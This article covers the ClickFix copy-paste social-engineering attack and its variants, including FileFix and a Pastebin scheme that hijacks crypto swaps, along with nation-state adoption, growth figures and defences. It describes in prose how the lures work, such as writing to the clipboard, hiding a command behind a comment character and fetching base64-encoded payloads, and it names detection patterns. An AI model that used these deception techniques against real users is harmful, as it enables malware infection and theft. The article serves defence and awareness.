ClickFix: The Copy-Paste Attack That Turns You Into Your Own Worst Enemy

How a social engineering technique surged over 500% in 2025, recruited nation-state hackers, and is now hijacking cryptocurrency swaps through Pastebin comments.

Somewhere right now, a person is staring at a fake error message on their screen. The prompt looks familiar—maybe a CAPTCHA, maybe a browser update, maybe a troubleshooting dialog from what appears to be Microsoft or Google. It tells them there's a problem, and it offers a fix. All they have to do is copy a command, paste it into their system terminal, and press Enter.

When they do, the malware installs itself. No drive-by download. No malicious attachment. No exploit kit. The victim did it with their own hands.

This is ClickFix, and it has become one of the defining cybersecurity threats of the past two years. What started as a niche trick deployed by a single initial access broker in early 2024 has erupted into a global phenomenon, adopted by criminal gangs and intelligence services alike, targeting individuals, enterprises, and government agencies across every major operating system.

And in its latest evolution, ClickFix is being weaponized through Pastebin comments to hijack cryptocurrency transactions in real time.

The Anatomy of a Self-Inflicted Compromise

ClickFix works by exploiting something no firewall or antivirus can fully protect against: human behavior.

The technique was first documented in March 2024 by researchers at Proofpoint, who identified it in campaigns run by the initial access broker tracked as TA571 and the ClearFake malware distribution cluster. Proofpoint's researchers coined the name “ClickFix” because the malicious prompts almost always included a button labeled “Fix,” “How to fix,” or “Fix it.”

That naming choice was more than descriptive—it pointed to the psychological core of the attack. The technique exploits a deeply conditioned behavior: when users encounter what appears to be a system error with a ready-made solution, many follow the instructions without questioning the source. Years of interacting with automated repair prompts, troubleshooters, and one-click fixes across operating systems have trained users to trust these interactions. Attackers recognized this pattern and weaponized it.

The basic attack unfolds in three steps. First, the victim lands on a webpage—via a compromised legitimate site, a phishing link, or SEO poisoning—displaying what appears to be a CAPTCHA verification, a browser error, or a document rendering problem. Second, the page silently copies a malicious command—typically a PowerShell script or shell command—to the victim's clipboard using JavaScript's navigator.clipboard.writeText() API. Third, the victim is instructed to open a system dialog (the Windows Run box via Win+R, Terminal on macOS, or a browser console) and paste the command.

In MITRE ATT&CK terms, this maps to T1204.004 (User Execution: Malicious Copy/Paste)—a sub-technique added specifically to capture this pattern—combined with T1059.001 (Command and Scripting Interpreter: PowerShell) and T1189 (Drive-by Compromise) for the initial delivery.

The result is that the victim bypasses their own security protections. Endpoint detection tools, browser sandboxes, and email filters are all designed to stop automated malware delivery. ClickFix sidesteps all of them by having the user execute the malicious payload manually. The browser sees a legitimate clipboard copy event. The EDR sees the user opening PowerShell. Neither triggers an alert, because the actions are indistinguishable from normal user behavior in isolation.

An Explosion in Scale

The numbers tell a stark story. ESET's H1 2025 Threat Report, released in June 2025, found that ClickFix detections skyrocketed by over 500% compared to H2 2024. Infosecurity Magazine, reporting on the same ESET telemetry data in November 2025, specified the increase at 517%. The technique accounted for nearly 8% of all blocked attacks during the period, making it the second most common attack vector behind only traditional phishing.

Jiří Kropáč, Director of Threat Prevention Labs at ESET, said in a statement accompanying the report's June 2025 release: “The list of threats that ClickFix attacks lead to is growing by the day, including infostealers, ransomware, remote access trojans, cryptominers, post-exploitation tools, and even custom malware from nation-state-aligned threat actors.”

The Center for Internet Security (CIS) published corroborating data in an October 2025 advisory. The CIS Cyber Threat Intelligence team, which tracked ClickFix campaigns between January and October 2025, noted that the technique comprised over a third of all non-malware alerts generated by Albert—CIS's intrusion detection system deployed across U.S. state, local, tribal, and territorial (SLTT) government networks—in the first half of 2025. The CIS team tracked campaigns that led directly to ransomware deployment, including an August 2025 Interlock ransomware incident impacting an SLTT government victim.

Separately, ReliaQuest reported in June 2025 that ClickFix was a key driver behind a 10% increase in detected drive-by compromises during the March through May 2025 period.

What makes this growth especially alarming is the democratization of the technique. ESET's report found that threat actors are now selling ClickFix builders on the dark web, providing even low-skilled attackers with weaponized landing pages ready for deployment. This trend has since accelerated: a cybercrime tool called ErrTraffic, first identified by Hudson Rock researchers on Russian-language forums in December 2025 and subsequently reported by BleepingComputer, allows threat actors to automate ClickFix attacks by generating fake visual glitches on compromised websites. Sold for a one-time purchase of $800, ErrTraffic includes OS fingerprinting, geolocation targeting, and multi-platform payload delivery across Windows, macOS, Android, and Linux. Dashboard data from active campaigns showed conversion rates approaching 60%. The barrier to entry has collapsed.

From Cybercrime to Espionage

Perhaps the clearest signal that ClickFix has moved from a fringe technique to an established weapon in the global threat landscape is its adoption by nation-state actors.

In an April 2025 report titled “Around the World in 90 Days,” Proofpoint documented how at least four state-sponsored groups incorporated ClickFix into their espionage campaigns between October 2024 and January 2025. The groups spanned three countries: North Korea's Kimsuky (tracked as TA427), Iran's MuddyWater (tracked as TA450), and two Russian groups—APT28 (TA422) and a cluster tracked as UNK_RemoteRogue.

Each group adapted ClickFix to its existing tradecraft. Kimsuky, for example, targeted individuals working on North Korean policy issues by posing as Japanese diplomatic personnel. In one documented case, TA427 operators masqueraded as a Japanese diplomat and contacted the target about arranging a meeting with Japan's ambassador to the United States. After building trust through legitimate-seeming communications, the attackers directed victims to websites that impersonated secure document-sharing platforms, where the ClickFix lure waited.

MuddyWater took a different approach, sending phishing emails from the attacker-controlled address [email protected] to targets in at least 39 organizations across the Middle East. The emails masqueraded as urgent Microsoft security updates, instructing recipients to execute commands that would supposedly patch a critical vulnerability.

Proofpoint noted in its analysis that while ClickFix did not revolutionize these groups' campaigns, it replaced the installation and execution stages in their existing infection chains with a method that leveraged human interaction to bypass security measures. The researchers also observed that some groups experimented with the technique in limited campaigns before returning to their standard tactics—a pattern suggesting ongoing evaluation of its operational value.

Since the Proofpoint report's publication, additional nation-state adoption has emerged. In February and March 2025, Sekoia documented Lazarus Group—a North Korean threat actor tracked separately from Kimsuky—launching “ClickFake” campaigns that used ClickFix tactics to target non-technical employees at centralized finance companies, impersonating major cryptocurrency firms including Coinbase, Kraken, and Bybit. More recently, in February 2026, Google's Mandiant researchers documented UNC1069, a North Korean threat group, using ClickFix with a spoofed Zoom meeting to deploy seven distinct macOS malware families against a cryptocurrency executive. The victim was contacted via Telegram from a compromised account of a crypto company executive, lured to a spoofed Zoom page, and then directed to follow troubleshooting steps for fake audio issues that initiated the infection chain.

Microsoft's own security team published a comprehensive analysis in August 2025 titled “Think Before You Click(Fix),” documenting campaigns they identified targeting organizations in government, finance, transportation, and education across Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico. The campaigns delivered Lampion malware, an infostealer focused on banking information, and as of the publication date, remained active.

The Pastebin Crypto Swap Attack

While ClickFix has been deployed through dozens of different lures—fake CAPTCHAs, browser errors, meeting invitations, Windows update screens—one of its more recent and technically interesting variants targets cryptocurrency users through Pastebin comments.

As reported by BleepingComputer in February 2026, threat actors are distributing ClickFix-style attacks through Pastebin, tricking cryptocurrency users into executing malicious JavaScript in their browser that hijacks Bitcoin swap transactions and redirects funds to attacker-controlled wallets. The campaign uses social engineering that promises large profits from a supposed arbitrage exploit on the Swapzone.io cryptocurrency exchange aggregator.

A detailed technical analysis published by BeyondMachines broke down the mechanics. Posts advertised as a “Crypto Exchange profit method” link to a Google Drive document presented as an “exploit guide.” The document provides a fake technical explanation of a supposed backend vulnerability in the systems of real exchange ChangeNOW, promising approximately 37% profit during cryptocurrency conversion. The instructions describe a “simple program” that users need to run.

The instructions tell victims to navigate to Swapzone.io, then manually type javascript: in their browser's address bar—since browsers block pasting this prefix as a security measure—and paste in a script that the attackers provide. What actually happens is far from simple. The script contains a URL with a base64-encoded payload hidden in the path structure. It extracts this encoded string, decodes it, fetches the real malicious code from a remote server, and executes it.

The BeyondMachines analysis found that the decoded payload contains multiple attack vectors working in concert. Functions modify the displayed exchange rates and amounts on the Swapzone interface to show the fake 37% profit increase. Meanwhile, clipboard hijacking silently replaces any copied wallet addresses with attacker-controlled addresses. The victim sees inflated exchange rates, believes the exploit is working, and initiates a swap—sending their cryptocurrency directly to the attacker.

The scam's social engineering is particularly effective because it exploits greed rather than fear. Unlike typical ClickFix lures that create urgency around a fake problem, this variant appeals to the victim's desire to profit from someone else's vulnerability. As the BeyondMachines researchers pointed out, the premise collapses under basic scrutiny: a 37% rate discrepancy would be detected within minutes by professional arbitrage traders, the technical explanation involving “Node v1.9” is architecturally nonsensical, and anyone who actually discovered such a flaw would simply exploit it themselves rather than sharing it with strangers on Pastebin.

This crypto-targeting variant is emerging within a broader context of industrial-scale cryptocurrency fraud. According to Chainalysis's 2026 Crypto Crime Report, an estimated $14 billion in cryptocurrency was received by scam-linked addresses on-chain in 2025, with the firm projecting the total could exceed $17 billion as additional illicit wallets are identified—consistent with their historical reporting patterns where estimates grow by an average of 24% between reporting periods. Impersonation scams posted a staggering 1,400% year-over-year growth, and the firm found that AI-enabled scams were 4.5 times more profitable than traditional scams. The average scam payment increased from $782 in 2024 to $2,764 in 2025.

The Expanding Attack Surface

ClickFix has not remained confined to Windows. ESET's H1 2025 report explicitly noted that the technique affects all major operating systems, including Windows, Linux, and macOS. While Windows remains the primary target, the cross-platform expansion represents a significant escalation in the threat's reach.

Campaigns targeting macOS users gained particular momentum in 2025. Sekoia had documented macOS-targeting ClickFix campaigns as early as late 2024 through fake Google Meet pages distributing infostealers. By mid-2025, the campaigns had grown more sophisticated. CloudSEK identified a campaign impersonating Spectrum, a U.S. telecommunications provider, that used ClickFix to deliver the Atomic macOS Stealer (AMOS) infostealer through typosquatted domains. Microsoft subsequently documented the same campaign cluster in their August 2025 analysis, noting that the delivery pages contained implementation errors—including displaying Windows-specific instructions to macOS users—suggesting hastily assembled infrastructure.

Linux targeting, while less extensively documented in public reporting, represents an underappreciated risk. Enterprise servers, developer workstations, and cloud environments running Linux could be targeted through ClickFix lures that instruct users to paste commands into terminal emulators. ErrTraffic explicitly includes Linux payload delivery, and the same social engineering principles that work against Windows and macOS users apply equally to Linux administrators accustomed to executing commands in the shell.

In February 2026, BleepingComputer reported that threat actors were abusing Claude AI artifacts and Google Ads in ClickFix campaigns delivering infostealer malware to macOS users searching for specific queries. Moonlock Lab and AdGuard researchers found that over 10,000 users had accessed the malicious content, which was hosted on the claude.ai domain. The campaign demonstrated that the technique continues to evolve across both platforms and delivery mechanisms, with attackers leveraging trusted AI platforms to host malicious instructions that appear legitimate.

The technique has also spawned variants. In June 2025, security researcher mr.d0x introduced FileFix, a stealthier evolution that shifts the attack from the Windows Run dialog to the Windows File Explorer address bar. A malicious webpage opens a legitimate Explorer window via the HTML <input type="file"> element while silently copying a disguised PowerShell command to the user's clipboard. The victim is instructed to paste what appears to be a file path into the Explorer address bar. The pasted content conceals the malicious command before a comment character (#), so only a benign-looking file path is visible in the address bar, while the hidden PowerShell command executes.

Check Point Research observed threat actors actively testing FileFix in real-world campaigns within two weeks of its public disclosure, identifying a phishing domain registered on July 6, 2025 that deployed FileFix scripts.

Other variants include TerminalFix, which convinces users to manually open native shell applications, and DownloadFix, which tricks users into downloading and running malicious files through different pretexts. A variant called ConsentFix, reported by BleepingComputer, abuses the Azure CLI OAuth app to hijack Microsoft accounts without requiring a password or bypassing multi-factor authentication—representing a significant escalation beyond traditional credential theft toward direct account takeover through OAuth consent phishing. Each variant exploits the same core vulnerability: user trust in routine system interactions.

Defense Strategies

Defending against ClickFix requires a layered approach that addresses both the technical and human dimensions of the attack.

On the technical side, the CIS advisory provides a strong starting point: restrict PowerShell execution for standard users by setting ExecutionPolicy to AllSigned or Restricted via Group Policy, ensuring only signed scripts can run. Use AppLocker or Software Restriction Policies to prevent PowerShell from launching for non-administrative users entirely. Enforce UAC credential prompting so that launching PowerShell requires full administrative credentials. For organizations using Windows Defender Application Control (WDAC), deploy code integrity policies that block PowerShell when launched from suspicious parent processes.

Beyond PowerShell hardening, block execution of commonly abused Living-off-the-Land Binaries (LOLBins) from user directories. mshta.exe is a primary concern—it executes HTML Applications (.hta files) and is a core component of both ClickFix and FileFix delivery chains. Removing or blocking mshta.exe eliminates one of the more dangerous execution paths.

For SIEM platforms, detection engineers including Florian Roth of Nextron Systems have published Sigma rules specifically targeting ClickFix behavior patterns: explorer.exe spawning mshta.exe, PowerShell processes initiated from unusual parent processes, and Base64-encoded commands passed to powershell.exe via the Run dialog. Enable PowerShell logging at three levels—Transcript, Module, and Script Block logging—to ensure visibility into what actually executes when a user pastes a command.

Darktrace, in a June 2025 case study, demonstrated how anomaly-based detection could identify ClickFix activity after initial access by detecting unusual PowerShell user agents, unexpected external communications, and data exfiltration patterns—even when the initial compromise occurred outside the organization's visibility.

If a webpage asks you to open Run, Terminal, or a browser console, close the page and report it. This principle should be reinforced in security awareness training with the same emphasis given to phishing link identification.

For cryptocurrency users specifically, the Pastebin crypto swap variant carries a clear lesson: if someone is sharing an exploit that supposedly generates free money, the scam is you. No legitimate vulnerability would be broadcast on Pastebin. Arbitrage discrepancies of 37% do not exist undetected. And typing javascript: into your browser's address bar to run untrusted code is effectively handing your wallet to a stranger.

What Comes Next

ClickFix represents a fundamental shift in attacker methodology. Rather than fighting endpoint security tools head-on, attackers have found it more efficient to recruit users as unwitting accomplices. The technique's growth trajectory, its adoption by nation-state groups across three countries within a single quarter, the emergence of commercial builders and automation tools like ErrTraffic, and the proliferation of variant techniques all point to a threat that is still in its expansion phase.

The proliferation of ClickFix also reflects a broader trend visible in the Chainalysis data: crypto crime is no longer primarily about technical exploits. It is increasingly about deception sophisticated enough to bypass human skepticism. Scams now rely on something harder to patch than a vulnerable smart contract: human trust.

As long as people can be convinced to paste a command they do not understand into a prompt they should not have opened, ClickFix and its descendants will continue to find victims. The defense starts with a single principle: no legitimate service will ever ask you to fix a problem by running a command you copied from a webpage. If it does, the only thing that needs fixing is your browser tab—close it.